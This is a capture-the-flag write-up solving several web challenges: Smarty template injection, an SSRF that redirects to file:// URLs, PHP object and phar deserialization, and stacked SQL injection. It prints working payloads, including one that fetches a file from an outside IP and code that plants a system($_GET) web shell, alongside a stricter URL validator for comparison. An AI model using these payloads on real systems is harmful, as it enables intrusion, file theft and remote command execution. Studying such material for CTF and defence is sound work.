I did not play much CTF over the winter break, and AntCTF and D^3CTF both landed right at the start of term. This is a small contest run by 四叶草安全 (CloverSec); all easy problems, so just a quick look.
GET
Smarty template injection. `{if phpinfo()}{/if}` runs, so arbitrary PHP can be executed through the `{if}` tag. The word `flag` is filtered in the parameter, so smuggle it in through a request header instead: `getallheaders()` returns the request headers, `array_flip()` turns the header values into keys, and `array_rand()` picks one of those keys, which then becomes the argument of `show_source()`. Keep in mind that `array_rand()` really is random across every header the request carries, so either send as few headers as possible or repeat the request until the `0: flag.php` header is the one picked.
```
?flag={if%20show_source(array_rand(array_flip(getallheaders())))}{/if}
```

Extra request header:

```
0: flag.php
```
Website
The page offers a form for submitting a URL. Testing shows the request is made from the server side, presumably with PHP's curl. Only URLs starting with http or https are accepted, so the first attempt is a 302 redirect to another scheme, hosted on a server I control:
```php
<?php
// Hosted on the attacker's server; the target follows the redirect
header("Location: file:///etc/passwd");
exit;
?>
```
That reads /etc/passwd. Trying to read the flag directly found nothing. /proc/self/cwd resolves to the working directory of the process performing the read, and under mod_php PHP chdir()s into the running script's directory, so /proc/self/cwd/index.php returns the source of the page itself:
```php
<?php
error_reporting(0);
function check_302($url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // 302 redirect
    curl_exec($ch);
    $info = curl_getinfo($ch);
    curl_close($ch);
    return $info['url']; // effective URL after redirects; its scheme is never checked
}
if (isset($_GET['url'])) {
    $url = $_GET['url'];
    // Prefix check only: "http://127.0.0.1:8080/" or "http://127.0.0.1@host/" is not caught
    if (strpos($url, 'http://127.0.0.1/') === 0 || strpos($url, 'http://localhost/') === 0) {
        exit("<script>alert('Cloversec WAF!')</script>");
    }
    // Only constrains the start of the string; the "." in the group is unescaped
    if (!preg_match('/^(http|https):\/\/[_a-zA-Z0-9-]+(.[_a-zA-Z0-9-]+)*/i', $url)) {
        exit("<script>alert('Cloversec WAF!')</script>");
    }
    $url = check_302($url);
    echo $url;
    // Second fetch: the post-redirect URL, with libcurl's default protocol list (file:// included)
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    $result = curl_exec($ch);
    curl_close($ch);
    echo "<div class='yulan'><head> <base href='" . $url . "/'> </head><!-- body follows --><br>" . $result . "</div>";
} else {
    echo "<div class='yulan'><h2>Hello</h2></div>";
}
?>
```

This two-step fetch is what makes the redirect trick work. libcurl on its own refuses to follow a redirect to file:// (FILE has been excluded from the default CURLOPT_REDIR_PROTOCOLS since 7.19.4), but curl_getinfo() still reports the redirect target as the effective url, and the script then opens that URL with a fresh handle whose default CURLOPT_PROTOCOLS does allow file://.
The response header says Server: Apache/2.2.15. That is the httpd build shipped with RHEL/CentOS 6, whose configuration lives at /etc/httpd/conf/httpd.conf; reading it through the same file:// trick gives:
```apache
<VirtualHost _default_:80>
DocumentRoot /var/www/html/web1
</VirtualHost>
<VirtualHost *:8080>
DocumentRoot /var/www/html/web2
</VirtualHost>
```
So there is a second vhost on port 8080. Read its source, /var/www/html/web2/index.php:
```php
<?php
class copy_file{
    public $path = 'upload/';
    public $file;
    public $url;
    function __destruct(){
        // Prefix check only: "http://127.0.0.1@host/..." also starts with this string
        if(strpos($this -> url,'http://127.0.0.1') === 0){
            // Arbitrary file write: $file is not sanitised and the fetched body is written as-is
            file_put_contents($this -> path.$this -> file, file_get_contents($this -> url));
            echo $this -> path.$this -> file." update successed!)<br>";
        }else{
            echo "Hello CTFer";
        }
    }
}
if(isset($_GET['data'])){
    $data = $_GET['data'];
    unserialize($data);   // user-controlled unserialize; __destruct fires when the object is freed
}else{
    echo "<h2>Welcome to CloverSec WebSite<h2>";
}
?>
```
Simple to exploit: unserialize a copy_file whose url is fetched and written to path.file, i.e. drop a web shell. I first tried writing into the web1 path, but there was no permission; only web2's upload directory is writable.
```php
<?php
// Local copy of the target class, used only to serialize the payload.
// Note that __destruct also runs locally when this script ends.
class copy_file{
    public $path = 'upload/';
    public $file;
    public $url;
    function __destruct(){
        var_dump(strpos($this -> url,'http://127.0.0.1') === 0);   // sanity check: must print true
        if(strpos($this -> url,'http://127.0.0.1') === 0){
            file_put_contents($this -> path.$this -> file, file_get_contents($this -> url));
            echo $this -> path.$this -> file." update successed!)<br>";
        }else{
            echo "Hello CTFer";
        }
    }
}
$a = new copy_file();
$a->file = 'a.php';
// 127.0.0.1 is parsed as userinfo; the real host is the attacker's 47.102.210.191:8000
$a->url = 'http://127.0.0.1@47.102.210.191:8000/a.txt';
echo urlencode(serialize($a));
?>
```
The @ pushes 127.0.0.1 into the userinfo part of the URL: the string still starts with http://127.0.0.1, so the strpos() check passes, while file_get_contents() actually connects to 47.102.210.191:8000. a.txt holds a GET-parameter one-line web shell, for convenience. The payload is delivered to web2 through web1's SSRF, again via a redirect:
```php
<?php
// Hosted on the attacker's server; web1 follows the redirect to web2 on port 8080
header("Location: http://127.0.0.1:8080/?data=O%3A9%3A%22copy_file%22%3A3%3A%7Bs%3A4%3A%22path%22%3Bs%3A7%3A%22upload%2F%22%3Bs%3A4%3A%22file%22%3Bs%3A5%3A%22a.php%22%3Bs%3A3%3A%22url%22%3Bs%3A42%3A%22http%3A%2F%2F127.0.0.1%4047.102.210.191%3A8000%2Fa.txt%22%3B%7D");
exit;
?>
```
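As an added example (not code from the challenge or the original writeup), the web1 WAF check and the web2 copy_file check above are reimplemented side by side with a stricter validator, so that the URLs used in this section can be run through all three at once. attacker.example stands in for the redirect host; the stricter validator deliberately accepts only IP-literal hosts so the script runs offline, as the comments explain.

```php
<?php
// Added example, not the challenge's code: the web1 WAF check and the web2 copy_file
// check reimplemented next to a stricter validator, to show which URLs each lets
// through and why.  attacker.example is an illustrative host; 47.102.210.191 is the
// host used in the payload above.

// web1 WAF, copied from index.php: two prefix checks plus a regex anchored only at the start.
function web1_waf_allows($url)
{
    if (strpos($url, 'http://127.0.0.1/') === 0 || strpos($url, 'http://localhost/') === 0) {
        return false;
    }
    return preg_match('/^(http|https):\/\/[_a-zA-Z0-9-]+(.[_a-zA-Z0-9-]+)*/i', $url) === 1;
}

// web2, copied from copy_file::__destruct: a bare prefix check.
function web2_allows($url)
{
    return strpos($url, 'http://127.0.0.1') === 0;
}

// Stricter validator: parse first, then decide on the parsed parts rather than on the
// string prefix.  Only IP-literal hosts are accepted so the example runs offline; a real
// deployment would resolve hostnames, check every returned address the same way and pin
// the connection to that address (otherwise DNS rebinding defeats the check).
function strict_allows($url)
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;
    }
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) {
        return false;
    }
    if (isset($p['user']) || isset($p['pass'])) {        // "127.0.0.1@..." ends up here
        return false;
    }
    $host = trim($p['host'], '[]');
    // NO_PRIV_RANGE rejects 10/8, 172.16/12, 192.168/16; NO_RES_RANGE rejects 127/8, 169.254/16, ::1, ...
    return filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}

// Fetch side: even a correct validator is useless if the HTTP client can be redirected
// to another scheme, so pin the protocols in libcurl and stop following redirects.
function strict_fetch($url)
{
    if (!strict_allows($url)) {
        return false;
    }
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_REDIR_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);   // re-validate each hop yourself if redirects are needed
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;
}

$urls = [
    'http://127.0.0.1/flag.php',                    // the only shape the web1 prefix check stops
    'http://127.0.0.1:8080/flag_WebSite_SsRf.txt',  // a port breaks the "http://127.0.0.1/" prefix
    'http://127.0.0.1@47.102.210.191:8000/a.txt',   // userinfo trick from the copy_file payload
    'http://attacker.example/302.php',              // whatever this redirects to is never checked
    'file:///etc/passwd',                           // what check_302() hands to the second curl
];
foreach ($urls as $u) {
    $host = parse_url($u, PHP_URL_HOST);
    printf("%-46s web1=%d web2=%d strict=%d real-host=%s\n", $u,
        web1_waf_allows($u), web2_allows($u), strict_allows($u), $host === null ? '-' : $host);
}
```

Run it with `php check_urls.php`. The userinfo line is the instructive one: both prefix checks return 1 for it, while parse_url() reports 47.102.210.191 as the host and 127.0.0.1 as the user, which is exactly what the stricter validator keys on.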
The shell never came up, but looking into the web2 directory turned up flag_WebSite_SsRf.txt. It can be fetched directly through the SSRF; the web1 check wants exactly the prefix http://127.0.0.1/, so a URL with port 8080 passes:

http://4b7c0f6a.yunyansec.com/index.php?url=http://127.0.0.1:8080/flag_WebSite_SsRf.txt

flag{d195eeb026cadd7d00e79d112b102f00}
filemange
code.html gives the source:
```php
<?php
$path = "./sandbox/";
class game
{
    public $file_name;
    public $content = "Hello World";
    public function __construct($file_name)
    {
        $this->file_name = $file_name;
    }
    public function __wakeup()
    {
        // strpos() without === false: a match at offset 0 is falsy and slips through
        if (strpos($this->content, "php")) {
            die("Hacker...");
        }
    }
    public function __destruct()
    {
        $this->test();
    }
    public function test()
    {
        // file_name is not confined to the sandbox: written straight under the web root
        $filename = "/var/www/html/" . $this->file_name;
        file_put_contents($filename, $this->content);
        echo $this->file_name . " create Successful!!!";
    }
}
// $method is set in a part of the source not shown on code.html
if ($method == "unlink") {
    if (!isset($_POST['file'])) {
        echo 'unlink html form';
    } else {
        $file = $_POST['file'];
        // unlink() honours the phar:// wrapper, which unserializes the archive's metadata
        if (!unlink($file)) {
            echo "delete failed";
        } else {
            echo "delete succeeded";
        }
    }
}
?>
```
Clearly phar deserialization: build a phar whose metadata is a game object, rename the extension so it gets through the upload, upload it into the sandbox, and hand phar://./sandbox/<name> to the unlink handler. Two things to keep in mind: the __wakeup() check means the content must not contain the substring php (so no <?php tag; the short echo tag <?= works), and the trick relies on PHP unserializing phar metadata as soon as the archive is opened, which PHP 8.0 changed to happen lazily, only when getMetadata() is called.
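As an added example (not part of the original writeup), a generator for the phar described above. The output names, the .jpg extension and the shell body are assumptions; the challenge's upload rules are not shown on the page.

```php
<?php
// Added example, not the challenge's code: build the phar that makes the filemange
// unlink handler write a web shell.  Run with:  php -d phar.readonly=0 gen.php
// (phar creation is disabled by default).  File names, the .jpg extension and the
// shell body are assumptions; the challenge's upload rules are not shown on the page.

// Same class name and properties as the target; the methods are irrelevant on the
// generating side, only the serialized property list matters.
class game
{
    public $file_name;
    public $content;
}

$obj = new game();
$obj->file_name = 'shell.php';   // test() prepends /var/www/html/, so this lands in the web root
// __wakeup() dies when strpos($content, "php") is truthy.  The short echo tag contains no
// "php" at all and is always enabled since PHP 5.4, so it sidesteps the check cleanly.
$obj->content = '<?= system($_GET["c"]); ?>';
if (strpos($obj->content, 'php') !== false) {
    exit("content would trip __wakeup()\n");
}

@unlink('evil.phar');
$phar = new Phar('evil.phar');    // the name must end in .phar while the archive is built
$phar->startBuffering();
// The stub must end with __HALT_COMPILER(); a "GIF89a" prefix makes the file start with
// image magic bytes, which helps if the upload filter sniffs content (assumption).
$phar->setStub("GIF89a\n<?php __HALT_COMPILER(); ?>");
$phar->addFromString('dummy.txt', 'x');   // an archive needs at least one entry
$phar->setMetadata($obj);                 // serialize()d into the manifest; unserialize()d by the target
$phar->stopBuffering();
rename('evil.phar', 'evil.jpg');

echo "wrote evil.jpg\n";
echo "upload it into ./sandbox/, then POST to the unlink handler:\n";
echo "    file=phar://./sandbox/evil.jpg\n";
echo "the metadata is unserialized while the archive is opened, before the unlink is\n";
echo "attempted, so __wakeup() runs and __destruct() then writes /var/www/html/shell.php\n";
```

Whether the unlink itself succeeds does not matter: opening the archive through the phar:// wrapper is what triggers the unserialize, and the game object's __destruct() performs the write when it is freed.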
StAck3d 1nj3c
Same trick as [SUCTF 2019] EasySQL, whose backend ran select <input> || flag from Flag: stacked queries go through, and under MySQL's default sql_mode || is logical OR, so the flag column never reaches the output. After set sql_mode=PIPES_AS_CONCAT the || becomes string concatenation, and the final select 1 || flag ... returns the flag glued to the 1:
```sql
1;set sql_mode=PIPES_AS_CONCAT;select 1
```